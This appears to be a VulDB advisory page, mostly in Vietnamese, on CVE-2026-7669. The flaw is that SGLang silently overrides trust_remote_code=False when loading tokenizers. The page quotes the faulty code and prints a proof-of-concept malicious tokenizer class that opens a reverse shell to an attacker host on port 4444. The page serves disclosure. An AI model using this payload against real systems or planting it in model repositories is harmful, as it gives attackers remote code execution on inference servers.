sgl-project SGLang đến 0.5.9 HuggingFace Transformer hf_transformers_utils.py get_tokenizer trust_remote_code nâng cao đặc quyền
| CVSS Điểm tạm thời meta | Giá khai thác hiện tại (≈) | Điểm quan tâm CTI |
|---|---|---|
| 6.9 | $0-$5k | 0.00 |
Tóm tắt
Một lỗ hổng được phân loại là nghiêm trọng đã được phát hiện trong sgl-project SGLang đến 0.5.9. Thành phần bị ảnh hưởng là hàm get_tokenizer của tệp python/sglang/srt/utils/hf_transformers_utils.py thuộc thành phần HuggingFace Transformer Handler. Việc xử lý tham số trust_remote_code cùng với đầu vào False trong Boolean có thể dẫn đến nâng cao đặc quyền.
Lỗ hổng này được gọi là CVE-2026-7669. Tấn công có thể được khởi tạo từ xa. Bên cạnh đó, mã khai thác đã được phát hành.
Chi tiết
Một lỗ hổng được phân loại là nghiêm trọng đã được phát hiện trong sgl-project SGLang đến 0.5.9. Thành phần bị ảnh hưởng là hàm get_tokenizer của tệp python/sglang/srt/utils/hf_transformers_utils.py thuộc thành phần HuggingFace Transformer Handler. Việc xử lý tham số trust_remote_code cùng với đầu vào False trong Boolean có thể dẫn đến nâng cao đặc quyền. Việc xác định vấn đề bằng CWE sẽ dẫn đến CWE-94. Bản thông báo này tóm tắt như sau:
SGLang pins transformers==5.3.0 in pyproject.toml. Every current SGLang installation is affected. Both tokenizer_mode=\"auto\" (default) and tokenizer_mode=\"slow\" are vulnerable.Ngày phát hiện lỗi là 07/04/2026. Thông tin về điểm yếu đã được công bố bởi Nicholas Gould, David Rochester (ngould and davidrochester). Bản công bố này chứa:
trust_remote_code=False is an explicit security boundary. The user sets it to prevent code execution from untrusted models. SGLang silently overrides it, executing code in a context the user explicitly prohibited.
Lỗ hổng này được gọi là CVE-2026-7669. Tấn công có thể được khởi tạo từ xa. Thông tin kỹ thuật đã có sẵn. Tấn công yêu cầu độ phức tạp cao. Khai thác được cho là khó khăn. Lỗ hổng này có mức độ phổ biến thấp hơn trung bình. Bên cạnh đó, mã khai thác đã được phát hành. Thông tin về khai thác đã được công bố rộng rãi và có khả năng bị lợi dụng. Vào lúc này, giá exploit ước khoảng USD $0-$5k. Dự án MITRE ATT&CK xác định kỹ thuật tấn công là T1059. Phần mã sau đây là nguyên nhân gây ra lỗ hổng này:
# python/sglang/srt/utils/hf_transformers_utils.py:898-909
if not trust_remote_code and type(tokenizer)._name_ == "TokenizersBackend":
tokenizer = AutoTokenizer.from_pretrained(
tokenizer_name,
*args,
trust_remote_code=True,
tokenizer_revision=tokenizer_revision,
clean_up_tokenization_spaces=False,
**kwargs,
) Thông báo cảnh báo như sau:On the first call with trust_remote_code=False, transformers returns TokenizersBackend without executing the .py file. SGLang detects this, silently retries with trust_remote_code=True, and transformers executes tokenizer.py.
Nếu trường này có độ dài, thì nó được đặt là bằng chứng khái niệm. Khai thác này được chia sẻ để tải xuống tại github.com. Lỗ hổng này đã là một zero-day chưa được tiết lộ trong ít nhất 25 ngày. Mã nguồn của khai thác như sau:
import os, pathlib
from transformers import PreTrainedTokenizerFast
class MaliciousTokenizer(PreTrainedTokenizerFast):
def _init_(self, args, *kwargs):
pathlib.Path("/tmp/sglang_rce_marker").write_text("pwned")
host = os.environ.get("ATTACKER_HOST")
if host:
import socket
s = socket.socket()
s.connect((host, int(os.environ.get("ATTACKER_PORT", "4444"))))
os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2)
os.execve("/bin/sh", ["sh"], os.environ)
super()._init_(args, *kwargs) Khuyến nghị nêu rõ:The PoC runs 7 phases producing 29 individually testable claims. The four core proof phases isolate the bug to lines 898-909: Phase 1 confirms transformers respects False (rules out an upstream bug); Phase 1b confirms sglang with those 9 lines stripped respects False (isolates the cause); Phase 2 confirms unpatched sglang overrides it; Phase 2b confirms the strip is surgical (explicit True still loads). Phases 3-5 add slow-mode coverage, severity context, and a chain-reachability check that confirms UI:R stands and 8.8 High is the correct CVSS.
Sản phẩm
Loại
Nhà cung cấp
Tên
Phiên bản
CPE 2.3
CPE 2.2
CVSSv4
VulDB Vector: 🔒VulDB Độ tin cậy: 🔍
CVSSv3
VulDB Điểm cơ sở meta: 7.2VulDB Điểm tạm thời meta: 6.9
VulDB Điểm cơ sở: 5.6
VulDB Điểm tạm thời: 5.1
VulDB Vector: 🔒
VulDB Độ tin cậy: 🔍
Nhà nghiên cứu Điểm cơ sở: 8.8
Nhà nghiên cứu Vector: 🔒
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Véc-tơ | Độ phức tạp | Xác thực | Bí mật | Toàn vẹn | Khả dụng |
|---|---|---|---|---|---|
| Mở khóa | Mở khóa | Mở khóa | Mở khóa | Mở khóa | Mở khóa |
| Mở khóa | Mở khóa | Mở khóa | Mở khóa | Mở khóa | Mở khóa |
| Mở khóa | Mở khóa | Mở khóa | Mở khóa | Mở khóa | Mở khóa |
VulDB Điểm cơ sở: 🔒
VulDB Điểm tạm thời: 🔒
VulDB Độ tin cậy: 🔍
Nhà nghiên cứu Điểm cơ sở: 🔒
Khai thác
Lớp: Nâng cao đặc quyềnCWE: CWE-94 / CWE-74 / CWE-707
CAPEC: 🔒
ATT&CK: 🔒
Vật lý: Không
Cục bộ: Không
Từ xa: Có
Khả dụng: 🔒
Truy cập: Công khai
Trạng thái: Bằng chứng khái niệm
Tác giả: Nicholas Gould/David Rochester (gouldnicholas/davidrxchester)
Ngôn ngữ lập trình: 🔒
Tải xuống: 🔒
EPSS Score: 🔒
EPSS Percentile: 🔒
Dự đoán giá: 🔍
Ước tính giá hiện tại: 🔒
| 0-Day | Mở khóa | Mở khóa | Mở khóa | Mở khóa |
|---|---|---|---|---|
| Hôm nay | Mở khóa | Mở khóa | Mở khóa | Mở khóa |
Tình báo mối đe dọa
Sự quan tâm: 🔍Diễn viên đang hoạt động: 🔍
Nhóm APT đang hoạt động: 🔍
Biện pháp đối phó
Khuyến nghị: không biện pháp giảm thiểu nào được biếtTrạng thái: 🔍
Thời gian 0-ngày: 🔒
Thời gian trễ khai thác: 🔍
dòng thời gian
07/04/2026 Lỗ hổng được tìm thấy07/04/2026 Nhà cung cấp đã được thông báo
02/05/2026 Khuyến cáo đã công bố
02/05/2026 Mục VulDB đã được tạo
03/05/2026 Khai thác đã công bố
04/05/2026 Cập nhật lần cuối VulDB
Nguồn
Nhà nghiên cứu: Nicholas Gould, David Rochester (ngould, davidrochester)Trạng thái: Không được định nghĩa
CVE: CVE-2026-7669 (🔒)
GCVE (CVE): GCVE-0-2026-7669
GCVE (VulDB): GCVE-100-360817
EUVD: 🔒
scip Labs: https://www.scip.ch/en/?labs.20161013
mục
Được tạo: 02/05/2026 10:05Đã cập nhật: 04/05/2026 06:26
Thay đổi: 02/05/2026 10:05 (54), 03/05/2026 04:01 (1), 04/05/2026 06:23 (51), 04/05/2026 06:26 (8)
Hoàn chỉnh: 🔍
Người gửi: ngould
Người cam kết: ngould
Cache ID: 216::103
Gửi
được chấp nhận
- Gửi #799263: sgl-project sglang <=0.5.9 Protection Mechanism Failure (Bởi ngould)
Several companies clearly confirm that VulDB is the primary source for best vulnerability data.
Chưa có bình luận nào Ngôn ngữ: vi + km + en.
Vui lòng đăng nhập để bình luận